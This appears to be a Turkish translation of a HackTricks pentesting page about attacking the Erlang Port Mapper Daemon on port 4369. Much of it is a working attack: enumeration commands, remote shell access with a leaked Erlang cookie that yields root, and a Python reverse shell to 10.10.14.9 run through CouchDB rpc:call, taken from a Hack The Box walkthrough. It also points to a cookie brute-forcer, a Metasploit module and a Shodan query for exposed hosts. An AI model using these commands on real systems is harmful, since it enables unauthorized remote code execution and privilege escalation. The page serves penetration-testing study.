7 KiB
AWS hacklemeyi sıfırdan kahraman olmaya öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Temel Bilgiler
Erlang Port Mapper Daemon (epmd), dağıtılmış Erlang örnekleri için bir koordinatör olarak hizmet eder. Sembolik düğüm adlarını makine adreslerine eşler ve her düğüm adının belirli bir adresle ilişkilendirildiğini sağlar. epmd'nin bu rolü, farklı Erlang düğümleri arasındaki sorunsuz etkileşim ve iletişim için önemlidir.
Varsayılan port: 4369
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
Bu, varsayılan olarak RabbitMQ ve CouchDB kurulumlarında kullanılır.
Numaralandırma
El ile
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
Otomatik
Erlang Port Mapper Daemon (EPMD), Erlang dilinde yazılmış bir sunucu uygulamasıdır. EPMD, Erlang dağıtılmış sistemlerindeki sunucuların bulunmasını ve iletişim kurmasını sağlar. Bu, Erlang tabanlı uygulamaların birbirleriyle iletişim kurmasını kolaylaştırır.
EPMD, varsayılan olarak TCP 4369 portunda çalışır. Bu nedenle, bir hedefin EPMD'yi kullanıp kullanmadığını belirlemek için bu portu taramak önemlidir.
EPMD, bir saldırganın hedef sistemdeki Erlang sunucularını keşfetmesine ve saldırı yapmasına olanak tanır. Saldırgan, EPMD'yi hedef sistemde çalıştıran sunucuların listesini alabilir ve bu sunuculara saldırı yapabilir.
EPMD'yi hedef sistemde taramak için otomatik araçlar kullanılabilir. Bu araçlar, EPMD'yi taramak ve sunucuların listesini almak için otomatik olarak TCP 4369 portunu kontrol eder. Bu, saldırganın hedef sistemdeki Erlang sunucularını keşfetmesini kolaylaştırır ve saldırı yapma potansiyelini artırır.
EPMD tarama araçları, saldırganlara hedef sistemdeki Erlang sunucularını keşfetme ve saldırı yapma yeteneği sağlar. Bu nedenle, bir sistem yöneticisi olarak, EPMD'yi korumak için güvenlik önlemleri almanız önemlidir. Bu önlemler arasında EPMD'yi güvenli bir şekilde yapılandırmak, gereksiz sunucuları kapatmak ve güvenlik duvarı kurallarıyla EPMD trafiğini sınırlamak bulunur.
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
Erlang Cookie RCE
Uzaktan Bağlantı
Eğer Kimlik Doğrulama çerezi sızdırabilirseniz, ana bilgisayarda kodu çalıştırabilirsiniz. Genellikle bu çerez ~/.erlang.cookie dosyasında bulunur ve erlang tarafından ilk başlatıldığında oluşturulur. Elle değiştirilmediyse veya ayarlanmadıysa, uzunluğu 20 karakter olan rastgele bir dize [A:Z] olarak oluşturulur.
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
Daha fazla bilgi için https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ adresine bakabilirsiniz.
Yazar ayrıca çerezin kaba kuvvet saldırısı için bir program paylaşıyor:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
Yerel Bağlantı
Bu durumda, ayrıcalıkları yerel olarak yükseltmek için CouchDB'yi kötüye kullanacağız:
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Örnek https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution adresinden alınmıştır. Bu zafiyeti nasıl sömürüleceğini öğrenmek için Canape HTB makinesini kullanabilirsiniz.
Metasploit
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
Shodan
port:4369 "portta"
AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github reposuna PR göndererek paylaşın.